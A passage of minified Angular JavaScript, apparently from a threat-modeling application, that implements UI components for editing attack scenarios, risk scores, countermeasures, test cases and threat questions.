e={name:"general.Highlighted",SystemThreats:this.dataService.Project.GetSystemThreats().filter(n=>this.attackScenario.ThreatCategories.includes(n.ThreatCategory))},i={name:"general.SystemThreats",SystemThreats:this.dataService.Project.GetSystemThreats().filter(n=>!e.SystemThreats.includes(n))};e.SystemThreats.length>0&&this.sysThreatGroups.push(e),this.sysThreatGroups.push(i)}return this.sysThreatGroups}OnSearchSystemThreat(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.sysThreatGroups=null,this.GetSystemThreatGroups();const i=e.target.value.toLowerCase(),n=this.attackScenario.SystemThreats;this.sysThreatGroups.forEach(r=>{r.SystemThreats=r.SystemThreats.filter(c=>n.includes(c)||c.Name.toLowerCase().includes(i))}),this.sysThreatGroups=this.sysThreatGroups.filter(r=>r.SystemThreats.length>0)}},250)}GetTargetsNames(){if(this.attackScenario.Targets)return this.attackScenario.Targets.map(e=>e.Name).join(", ")}AddAttackVector(){let e=this.dataService.Config.CreateAttackVector(null);this.dialog.OpenAddAttackVectorDialog(e).subscribe(i=>{i?this.attackScenario.AttackVector=e:this.dataService.Config.DeleteAttackVector(e)})}AddMethodCVSS(){this.attackScenario.ScoreCVSS={},this.EditMethodCVSS()}EditMethodCVSS(){this.dialog.OpenCVSSEntryDiaglog(this.attackScenario.ScoreCVSS).subscribe(()=>this.OnScoreCVSSChanged())}RemoveMethodCVSS(){this.attackScenario.ScoreCVSS=null}AddMethodOwaspRR(){this.attackScenario.ScoreOwaspRR={},this.EditMethodOwaspRR()}EditMethodOwaspRR(){this.dialog.OpenOwaspRREntryDiaglog(this.attackScenario.ScoreOwaspRR).subscribe(()=>this.OnScoreOwaspRRChanged())}RemoveMethodOwaspRR(){this.attackScenario.ScoreOwaspRR=null}OnScoreCVSSChanged(){this.attackScenario.Severity=Wm.ToThreatSeverity(this.attackScenario.ScoreCVSS.Score),this.attackScenario.CalculateRisk()}OnScoreOwaspRRChanged(){this.attackScenario.Severity=this.attackScenario.ScoreOwaspRR.Impact,this.attackScenario.Likelihood=this.attackScenario.ScoreOwaspRR.Likelihood,this.attackScenario.CalculateRisk()}GetThreatStates(){return ku.GetThreatStates()}GetThreatStateName(e){return ku.ToString(e)}GetSeverityTypes(){return vn.GetTypes()}GetSeverityTypeName(e){return vn.ToString(e)}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}GetThreatSources(){return null==this.threatSources&&(this.threatSources=this.dataService.Project.GetThreatSources().Sources),this.threatSources}ThreatSourcesAll(){return this.attackScenario.ThreatSources.length==this.dataService.Project.GetThreatSources().Sources.length}ThreatSourcesSome(){return this.attackScenario.ThreatSources.length>0&&!this.ThreatSourcesAll()}ThreatSourcesLabel(){return this.ThreatSourcesAll()?"pages.modeling.attackscenario.threatSourcesNone":"pages.modeling.attackscenario.threatSourcesAll"}ThreatSourcesUpdate(e){this.attackScenario.ThreatSources=e?this.dataService.Project.GetThreatSources().Sources:[]}OnSearchThreatSources(e){this.searchCounter++,setTimeout(()=>{if(this.searchCounter--,0==this.searchCounter){this.threatSources=null,this.GetThreatSources();const i=e.target.value.toLowerCase(),n=this.attackScenario.ThreatSources;this.threatSources=this.threatSources.filter(r=>n.includes(r)||r.Name.toLowerCase().includes(i))}},250)}GetFilteredAttackScenarios(){return this.dataService.Project.GetAttackScenariosApplicable().filter(e=>e.Name.toLowerCase().includes(this.searchASString.toLowerCase())&&e!=this.attackScenario)}GetFilteredLinkedAttackScenarios(){return this.dataService.Project.GetAttackScenariosApplicable().filter(e=>e.Name.toLowerCase().includes(this.searchLinkedASString.toLowerCase())&&e!=this.attackScenario&&!this.attackScenario.LinkedScenarios.includes(e))}GetAttackScenarioGroups(){if(null==this.attackScenarioGroups){this.attackScenarioGroups=[];const e=this.dataService.Project.GetAttackScenariosApplicable().filter(i=>i!=this.attackScenario).reduce((i,n)=>Object.assign(Object.assign({},i),{[n.ViewID]:[...i[n.ViewID]||[],n]}),{});Object.keys(e).forEach(i=>{var n;this.attackScenarioGroups.push({name:null===(n=this.dataService.Project.GetView(i))||void 0===n?void 0:n.Name,scenarios:e[i]})}),this.attackScenarioGroups.forEach(i=>i.scenarios.sort((n,r)=>n.ThreatState>r.ThreatState?-1:n.ThreatState==r.ThreatState?0:1))}return this.attackScenarioGroups}AdoptRiskValuesFrom(e){e.ScoreCVSS&&(this.attackScenario.ScoreCVSS=JSON.parse(JSON.stringify(e.ScoreCVSS))),e.ScoreOwaspRR&&(this.attackScenario.ScoreOwaspRR=JSON.parse(JSON.stringify(e.ScoreOwaspRR))),this.attackScenario.Severity=e.Severity,this.attackScenario.SeverityReason=e.SeverityReason,this.attackScenario.Likelihood=e.Likelihood,this.attackScenario.LikelihoodReason=e.LikelihoodReason,this.attackScenario.Risk=e.Risk,this.attackScenario.RiskReason=e.RiskReason,this.attackScenario.RiskStrategy=e.RiskStrategy,this.attackScenario.RiskStrategyReason=e.RiskStrategyReason,this.OnLinkScenario(e)}GetRiskStrategies(){return fT.GetKeys()}GetRiskStrategyName(e){return fT.ToString(e)}GetFilteredCountermeasures(){return this.dataService.Project.GetCountermeasuresApplicable().filter(e=>e.Name.toLowerCase().includes(this.searchCMString.toLowerCase())&&!e.AttackScenarios.includes(this.attackScenario))}GetCountermeasureGroups(){if(null==this.countermeasureGroups){this.countermeasureGroups=[];const e=this.dataService.Project.GetCountermeasuresApplicable().filter(i=>!this.countermeasures.includes(i)).reduce((i,n)=>Object.assign(Object.assign({},i),{[n.ViewID]:[...i[n.ViewID]||[],n]}),{});Object.keys(e).forEach(i=>{var n;this.countermeasureGroups.push({name:null===(n=this.dataService.Project.GetView(i))||void 0===n?void 0:n.Name,countermeasures:e[i]})}),this.countermeasureGroups.forEach(i=>i.countermeasures.sort((n,r)=>n.MitigationState>r.MitigationState?-1:n.MitigationState==r.MitigationState?0:1))}return this.countermeasureGroups}AddExistingCountermeasure(e){e.AddAttackScenario(this.attackScenario),this.countermeasures=this.dataService.Project.GetCountermeasures().filter(i=>i.AttackScenarios.includes(this.attackScenario))}AddCountermeasure(){const e=this.dataService.Project.CreateCountermeasure(this.attackScenario.ViewID,!1);e.SetMapping(null,this.attackScenario.Targets,[this.attackScenario]),this.selectedCountermeasure=e,this.countermeasures=this.dataService.Project.GetCountermeasures().filter(i=>i.AttackScenarios.includes(this.attackScenario)),setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250)}RemoveCountermeasure(e){e.RemoveAttackScenario(this.attackScenario.ID),e==this.selectedCountermeasure&&(this.selectedCountermeasure=null),this.countermeasures=this.dataService.Project.GetCountermeasures().filter(i=>i.AttackScenarios.includes(this.attackScenario))}DeleteCountermeasure(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&(this.dataService.Project.DeleteCountermeasure(e),e==this.selectedCountermeasure&&(this.selectedCountermeasure=null),this.countermeasures=this.dataService.Project.GetCountermeasures().filter(n=>n.AttackScenarios.includes(this.attackScenario)))})}OnLinkScenario(e){this.attackScenario.AddLinkedAttackScenario(e),e.AddLinkedAttackScenario(this.attackScenario),this.selectedLinkedScenario=e}OnUnlinkScenario(e){this.attackScenario.RemoveLinkedAttackScenario(e.ID),e.RemoveLinkedAttackScenario(this.attackScenario.ID),this.selectedLinkedScenario==e&&(this.selectedLinkedScenario=null)}EditAttackScenario(e){this.dialog.OpenAttackScenarioDialog(e,!1,[this.attackScenario,...this.attackScenario.LinkedScenarios])}GetTestCases(){return this.dataService.Project.GetTesting().TestCases.filter(e=>!this.attackScenario.GetTestCases().includes(e))}GetFilteredTestCases(){return this.GetTestCases().filter(e=>e.Name.toLowerCase().includes(this.searchTCString.toLowerCase()))}OnLinkTestCase(e){e.AddLinkedAttackScenario(this.attackScenario),this.selectedTestCase=e}OnUnlinkTestCase(e){e.RemoveLinkedAttackScenario(this.attackScenario.ID),this.selectedTestCase==e&&(this.selectedTestCase=null)}GetSystemThreatsWidth(){return this.dataService.Project.Settings.ThreatActorToAttackScenario?"315px":"0px"}OnSearchASBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchASBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}OnSearchLinkedASBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchLinkedASBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}OnSearchCMBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchCMBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}OnSearchTCBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchTCBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Rc,8),Ee(Tt,8),Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-attack-scenario"]],viewQuery:function(e,i){if(1&e&&(Mi(F5e,5),Mi(V5e,5),Mi(B5e,5),Mi(H5e,5),Mi(U5e,5)),2&e){let n;Vt(n=Bt())&&(i.nameBox=n.first),Vt(n=Bt())&&(i.searchASBox=n.first),Vt(n=Bt())&&(i.searchLinkedASBox=n.first),Vt(n=Bt())&&(i.searchCMBox=n.first),Vt(n=Bt())&&(i.searchTCBox=n.first)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},inputs:{attackScenario:"attackScenario",canEdit:"canEdit"},decls:1,vars:1,consts:[[3,"disable",4,"ngIf"],["appearance","fill",2,"width","calc(100% - 85px)"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["nameBox",""],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","70px","float","right"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],["appearance","fill",1,"property-form-field"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["color","warn","style","margin-left: 5px;",3,"matTooltip",4,"ngIf"],["appearance","fill",1,"property-form-field","disable"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","value","matTooltip"],["appearance","fill",1,"disable",2,"margin-left","10px","width","calc(100% - 600px - 30px)"],["matInput","",3,"spellcheck","value"],["appearance","fill",1,"property-form-field","disable",2,"margin-left","10px"],["no-space","","matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],["matInput","",1,"searchBox",3,"placeholder","keyup"],[3,"label",4,"ngFor","ngForOf"],["mat-icon-button","","matSuffix","","matTooltipShowDelay","1000",2,"width","25px",3,"matTooltip","click"],["appearance","fill",2,"margin-left","10px","width","calc(100% - 300px - 15px)"],["no-space","","multiple","",3,"value","valueChange","selectionChange"],["appearance","fill"],["no-space","","multiple","",3,"value","valueChange"],["appearance","fill","style","margin-left: 10px; width: 300px;",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"tagableElement"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matMenuTriggerFor","matTooltip"],["raMenu","matMenu"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item","",3,"matMenuTriggerFor"],["viewList","matMenu"],["mat-menu-item","",3,"ngModel","matMenuTriggerFor","placeholder","ngModelChange","click"],["searchASBox",""],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData",4,"ngFor","ngForOf"],["scenarioList","matMenu"],["matMenuContent",""],["filteredScenarioList","matMenu"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngFor","ngForOf"],["appearance","fill","style","width: 200px; margin-left: 10px;",4,"ngIf"],["appearance","fill",2,"width","190px","margin-left","30px"],[3,"value","valueChange","selectionChange"],["matSuffix","","mat-icon-button","",3,"click",4,"ngIf"],["appearance","fill",2,"width","190px","margin-left","10px"],[3,"value","valueChange"],["appearance","fill","style","width: 100%;",4,"ngIf"],[1,"row",2,"margin-bottom","10px"],[1,"column1"],[1,"prop-list","reorder-list"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matMenuTriggerFor","matTooltip"],["addMenu","matMenu"],["mat-menu-item","",3,"click"],["existingMenu","matMenu"],["searchCMBox",""],["countermeasureList","matMenu"],["filteredCountermeasureList","matMenu"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px;",4,"ngIf"],[1,"expansion-panel-headers-align",2,"pointer-events","initial"],[4,"ngIf"],["addLinkedMenu","matMenu"],["searchLinkedASBox",""],["linkedScenarioList","matMenu"],["filteredLinkedScenarioList","matMenu"],["class","row","style","margin-bottom: 10px;",4,"ngIf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[1,"alert","alert-danger",2,"color","red"],[3,"value"],["color","warn",2,"margin-left","5px",3,"matTooltip"],[3,"label"],["matTooltipShowDelay","1000",3,"value","matTooltip",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip"],["appearance","fill",2,"margin-left","10px","width","300px"],["srcSearch",""],["class","mat-option","color","primary",3,"checked","indeterminate","change",4,"ngIf"],["color","primary",1,"mat-option",3,"checked","indeterminate","change"],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click"],["appearance","fill",2,"width","200px","margin-left","10px"],["matInput","","type","number",3,"ngModel","ngModelChange"],["matSuffix","","mat-icon-button","","aria-label","Edit",3,"click"],["matSuffix","","mat-icon-button","","aria-label","Delete",3,"click"],["matSuffix","","mat-icon-button","",3,"click"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto","margin-right","0px",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],[3,"countermeasure"],["matExpansionPanelContent",""],[3,"entry"],[3,"canEdit","attackVector"],[3,"canEdit","threatQuestion"],[3,"canEdit","threatRule"],[3,"canEdit","attackScenario"],["addLinkedTCMenu","matMenu"],["searchTCBox",""],["filteredTCList","matMenu"],[3,"testCase"]],template:function(e,i){1&e&&ne(0,$7e,405,211,"div",0),2&e&&V("ngIf",i.attackScenario)},styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.disable[_ngcontent-%COMP%]{pointer-events:none}.searchBox[_ngcontent-%COMP%]{padding:0 16px;width:calc(100% - 32px);height:35px!important;line-height:35px!important;font-size:14px;font-weight:400}']}),t})();function K7e(t,a){if(1&t&&(m(0,"span",7),s(1),u()),2&t){const e=B().$implicit;V("matBadge",B().GetUnsetThreats(e))("matBadgeHidden",e.UserCheckedElement),C(1),ke(e.Name)}}function X7e(t,a){1&t&&(m(0,"mat-icon",14),s(1,"info"),u()),2&t&&V("matTooltip",B().$implicit.Description)}function Y7e(t,a){if(1&t){const e=Ye();m(0,"button",13),he("click",function(){be(e);const n=B().$implicit;return Me(B(3).OpenAttackVectors(n))}),oe(1,"translate"),s(2,"\n                "),m(3,"mat-icon"),s(4,"pageview"),u(),s(5,"\n              "),u()}2&t&&at("matTooltip",re(1,1,"pages.modeling.stack.questiondialog.moreDetails"))}function J7e(t,a){if(1&t&&(m(0,"mat-button-toggle",18),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2).$implicit;V("value",B(3).GetOptionValue(i.OptionType,e)),C(1),ke(re(2,2,e))}}function Z7e(t,a){if(1&t){const e=Ye();m(0,"td"),s(1,"\n              "),m(2,"mat-button-toggle-group",15,16),he("change",function(n){be(e);const r=B().$implicit;return Me(B(3).OnQuestionAnswered(n,r))}),s(4,"\n                "),ne(5,J7e,3,4,"mat-button-toggle",17),s(6,"\n              "),u(),s(7,"\n            "),u()}if(2&t){const e=B().$implicit,i=B(3);C(2),V("value",i.selectedComponent.ThreatQuestions[e.ID]),C(3),V("ngForOf",i.GetOptionKeys(e.OptionType))}}function eRe(t,a){if(1&t){const e=Ye();m(0,"tr"),s(1,"\n            "),m(2,"td"),s(3),ne(4,X7e,2,1,"mat-icon",11),s(5,"\n              "),ne(6,Y7e,6,3,"button",12),s(7,"\n            "),u(),s(8,"\n            "),ne(9,Z7e,8,2,"td",4),s(10,"\n            "),m(11,"td"),s(12,"\n              "),m(13,"button",13),he("click",function(){const r=be(e).$implicit;return Me(B(3).OpenNotes(r))}),oe(14,"translate"),s(15,"\n                "),m(16,"mat-icon",7),s(17,"edit_note"),u(),s(18,"\n              "),u(),s(19,"\n            "),u(),s(20,"\n          "),u()}if(2&t){const e=a.$implicit,i=B(3);let n;C(3),ct("\n              ",e.Question," \n              "),C(1),V("ngIf",(null==e.Description?null:e.Description.length)>0),C(2),V("ngIf",(null==(n=i.GetAssociatedAttackVectors(e))?null:n.length)>0),C(3),V("ngIf",1==e.OptionType),C(4),at("matTooltip",re(14,7,"general.Notes")),C(3),V("matBadge",i.GetNotesCountOfQuestion(e))("matBadgeHidden",i.GetNotesCountOfQuestion(e)<1)}}function tRe(t,a){if(1&t){const e=Ye();m(0,"tr"),s(1,"\n            "),m(2,"td"),s(3),oe(4,"translate"),m(5,"button",19),he("click",function(){return be(e),Me(B(3).NavigateToSettings())}),oe(6,"translate"),s(7,"\n                "),m(8,"mat-icon"),s(9,"open_in_new"),u(),s(10,"\n              "),u(),s(11,"\n            "),u(),s(12,"\n          "),u()}2&t&&(C(3),ct("\n              ",re(4,2,"pages.modeling.stack.questiondialog.noConfiguredQuestions"),"\n              "),C(2),at("matTooltip",re(6,4,"general.openInNew")))}function iRe(t,a){if(1&t){const e=Ye();s(0,"\n        "),m(1,"mat-form-field",8),s(2,"\n          "),m(3,"mat-label"),s(4),oe(5,"translate"),u(),s(6,"\n          "),m(7,"textarea",9),he("ngModelChange",function(n){return be(e),Me(B().$implicit.Description=n)}),u(),s(8,"\n        "),u(),s(9,"\n        "),m(10,"h3"),s(11),oe(12,"translate"),u(),s(13,"\n        "),it(14,"app-notes",10),s(15,"\n        "),m(16,"table"),s(17,"\n          "),ne(18,eRe,21,9,"tr",2),s(19,"\n          "),ne(20,tRe,13,6,"tr",4),s(21,"\n        "),u(),s(22,"\n      ")}if(2&t){const e=B().$implicit,i=B();let n;C(4),ke(re(5,10,"properties.Description")),C(3),V("ngModel",e.Description),C(4),ke(re(12,12,"general.Notes")),C(3),V("showTimestamp",!0)("hasCheckbox",!1)("canToggleTimestamp",!0)("canToggleCheckbox",!0)("notes",i.selectedComponent.Notes),C(4),V("ngForOf",i.GetThreatQuestions(i.selectedComponent)),C(2),V("ngIf",0==(null==(n=i.GetThreatQuestions(i.selectedComponent))?null:n.length))}}function aRe(t,a){1&t&&(m(0,"mat-tab"),s(1,"\n      "),ne(2,K7e,2,3,"ng-template",5),s(3,"\n      "),ne(4,iRe,23,14,"ng-template",6),s(5,"\n    "),u())}function nRe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"button",20),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"button",21),he("click",function(){return be(e),Me(B().Prev())}),s(7),oe(8,"translate"),u(),s(9,"\n    "),m(10,"button",21),he("click",function(){return be(e),Me(B().Next())}),s(11),oe(12,"translate"),u(),s(13,"\n  "),Mt()}if(2&t){const e=B();C(2),V("mat-dialog-close",!0),C(1),ke(re(4,6,"general.Close")),C(3),V("disabled",!e.canPrev),C(1),ke(re(8,8,"tour.prev")),C(3),V("disabled",!e.canNext),C(1),ke(re(12,10,"tour.next"))}}let kG=(()=>{class t{constructor(e,i,n,r,c){this.dialogRef=e,this.data=i,this.dataService=n,this.dialog=r,this.router=c,this.selectedTabIndex=0}get components(){return this.data.components}get selectedComponent(){return this.data.selectedComponent}set selectedComponent(e){this.data.selectedComponent=e,this.selectedTabIndex=this.components.indexOf(this.selectedComponent)}get canNext(){return!(this.components.length<=1)&&this.selectedComponent!=this.components[this.components.length-1]}get canPrev(){return!(this.components.length<=1)&&this.selectedComponent!=this.components[0]}ngOnInit(){this.selectedComponent=this.selectedComponent,setTimeout(()=>{this.components.filter(e=>!e.UserCheckedElement).forEach(e=>{0==Object.values(e.ThreatQuestions).filter(i=>null==i).length&&(e.UserCheckedElement=!0)})},10)}OnQuestionAnswered(e,i){var n;this.selectedComponent.ThreatQuestions[i.ID]=e.value;let r=Pl.GetOptions(i.OptionType).find(d=>d.Value==e.value);this.selectedComponent.SetProperty(null===(n=i.Property)||void 0===n?void 0:n.ID,i.ChangesPerOption[r.Key].Value)}OpenAttackVectors(e){this.GetAssociatedAttackVectors(e).forEach(n=>{this.dialog.OpenViewAttackVectorDialog(n,!1)})}OpenNotes(e){null==this.selectedComponent.NotesPerQuestion[e.ID]&&(this.selectedComponent.NotesPerQuestion[e.ID]=[]),this.dialog.OpenNotesDialog(this.selectedComponent.NotesPerQuestion[e.ID],!0,!1,!0,!0)}GetUnsetThreats(e){let i=Object.values(e.ThreatQuestions).filter(n=>null===n).length;return 0!=i||e.UserCheckedElement?i.toString():(setTimeout(()=>{e.UserCheckedElement=!0},100),"")}GetNotesCountOfQuestion(e){return this.selectedComponent.NotesPerQuestion[e.ID]?this.selectedComponent.NotesPerQuestion[e.ID].length:0}GetAssociatedAttackVectors(e){let i=[];if(null!=e.Property){let n=this.dataService.Config.GetThreatRules().filter(r=>r.RuleType==on.Component&&r.ComponentRestriction.componentTypeID==this.selectedComponent.Type.ID);n=n.filter(r=>r.ComponentRestriction.DetailRestrictions.some(c=>c.PropertyRest.ID==e.Property.ID)),i.push(...n.filter(r=>null!=r.AttackVector).map(r=>r.AttackVector))}return i}GetThreatQuestions(e){let i=[];return Object.keys(e.ThreatQuestions).forEach(n=>i.push(this.dataService.Config.GetThreatQuestion(n))),i}GetOptionKeys(e){return Pl.GetOptions(e).map(i=>i.Key)}GetOptionValue(e,i){return Pl.GetOptions(e).find(n=>n.Key==i).Value}GetOptionValues(e){return Pl.GetOptions(e)}Next(){this.selectedComponent=this.components[this.components.indexOf(this.selectedComponent)+1]}Prev(){this.selectedComponent=this.components[this.components.indexOf(this.selectedComponent)-1]}NavigateToSettings(){this.router.navigate(["configuration"],{queryParams:{index:this.selectedComponent.Type.ComponentTypeID}})}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh),Ee(_p),Ee(Yi),Ee(Wn),Ee(Oo))},t.\u0275cmp=Wt({type:t,selectors:[["app-question-dialog"]],decls:15,vars:4,consts:[["mat-dialog-title",""],[2,"max-width","800px",3,"selectedIndex","selectedIndexChange"],[4,"ngFor","ngForOf"],["align","end"],[4,"ngIf"],["mat-tab-label",""],["matTabContent",""],["matBadgeColor","warn","matBadgePosition","below",3,"matBadge","matBadgeHidden"],["appearance","fill",2,"width","100%","margin","5px 0px"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5","type","text",3,"ngModel","ngModelChange"],[3,"showTimestamp","hasCheckbox","canToggleTimestamp","canToggleCheckbox","notes"],["style","vertical-align: middle;",3,"matTooltip",4,"ngIf"],["mat-icon-button","",3,"matTooltip","click",4,"ngIf"],["mat-icon-button","",3,"matTooltip","click"],[2,"vertical-align","middle",3,"matTooltip"],[3,"value","change"],["group",""],[3,"value",4,"ngFor","ngForOf"],[3,"value"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"matTooltip","click"],["mat-button","",3,"mat-dialog-close"],["mat-button","",3,"disabled","click"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),u(),s(2,"\n"),m(3,"mat-dialog-content"),s(4,"\n  "),m(5,"mat-tab-group",1),he("selectedIndexChange",function(r){return i.selectedComponent=i.components[r]}),s(6,"\n    "),ne(7,aRe,6,0,"mat-tab",2),s(8,"\n  "),u(),s(9,"\n"),u(),s(10,"\n"),m(11,"mat-dialog-actions",3),s(12,"\n  "),ne(13,nRe,14,12,"ng-container",4),s(14,"\n"),u()),2&e&&(C(1),ke(i.selectedComponent.Name),C(4),V("selectedIndex",i.selectedTabIndex),C(2),V("ngForOf",i.components),C(6),V("ngIf",!0))},styles:[".toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}"]}),t})();function oRe(t,a){if(1&t){const e=Ye();fi(),ln(),m(0,"button",2),he("click",function(){be(e);const n=B();return Me(n.AddTestCase(n.selectedComponent))}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"checklist"),u(),s(5,"\n    "),u()}if(2&t){const e=B();at("matTooltip",re(1,2,"pages.modeling.diagram.addTestCase")),V("disabled",!e.selectedComponent)}}function rRe(t,a){if(1&t&&(m(0,"div",25),s(1),u()),2&t){const e=B().$implicit,i=B(2);Ct("component-dark",i.theme.IsDarkMode),C(1),ke(i.GetComponentPort(e))}}function sRe(t,a){if(1&t){const e=Ye();m(0,"div",11),s(1,"\n            "),m(2,"button",23),he("click",function(){const r=be(e).$implicit;return Me(B(2).OnComponentClick(r))})("dblclick",function(){const r=be(e).$implicit;return Me(B(2).OnComponentDblClick(r))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B(2).OpenContextMenu(n,c))}),s(3),u(),s(4,"\n            "),ne(5,rRe,2,3,"div",24),s(6,"\n          "),u()}if(2&t){const e=a.$implicit,i=B(2);let n;C(2),ri("opacity",e.IsActive?1:.5)("border-color",i.GetComponentColor(e))("border-style",e.OutOfScope?"dotted":"solid"),Ct("component-dark",i.theme.IsDarkMode)("component-third-party",e.IsThirdParty),V("matBadge",i.CompBadge(e))("matBadgeHidden",0==i.CompBadge(e).length),C(1),ct("\n              ",e.Name,"\n            "),C(2),V("ngIf",(null==(n=i.GetComponentPort(e))?null:n.length)>0)}}function cRe(t,a){1&t&&(m(0,"button",26),s(1,"Temp"),u())}function lRe(t,a){if(1&t){const e=Ye();m(0,"tr",19),he("drop",function(n){const c=be(e).$implicit;return Me(B().OnDrop(n,c))}),s(1,"\n        "),m(2,"td")(3,"p",20),s(4),u()(),s(5,"\n        "),m(6,"td",10),s(7,"\n          "),ne(8,sRe,7,14,"div",21),s(9,"\n          "),ne(10,cRe,2,0,"button",22),s(11,"\n        "),u(),s(12,"\n      "),u()}if(2&t){const e=a.$implicit,i=B();C(4),ke(e.Name),C(4),V("ngForOf",i.GetComponents(e)),C(2),V("ngIf",null==i.GetComponents(e)||0==i.GetComponents(e).length)}}function dRe(t,a){if(1&t&&(m(0,"span",31),s(1),u()),2&t){const e=B(2).item;C(1),ke(e.GetProperty("Name"))}}function mRe(t,a){if(1&t){const e=Ye();m(0,"button",29),he("click",function(){be(e);const n=B(2).item;return Me(B().AddTestCase(n))}),s(1,"\n          "),m(2,"mat-icon"),s(3,"checklist"),u(),s(4,"\n          "),m(5,"span"),s(6),oe(7,"translate"),u(),s(8,"\n        "),u()}2&t&&(C(6),ke(re(7,1,"pages.modeling.diagram.addTestCase")))}function uRe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n        "),ne(2,dRe,2,1,"span",28),s(3," \n        "),m(4,"button",29),he("click",function(){be(e);const n=B().item;return Me(B().OnComponentDblClick(n))}),s(5,"\n          "),m(6,"mat-icon"),s(7,"question_answer"),u(),s(8,"\n          "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n        "),u(),s(13,"\n        "),m(14,"button",29),he("click",function(){be(e);const n=B().item;return Me(B().OnDeleteElement(n))}),s(15,"\n          "),m(16,"mat-icon"),s(17,"delete"),u(),s(18,"\n          "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n        "),u(),s(23,"\n        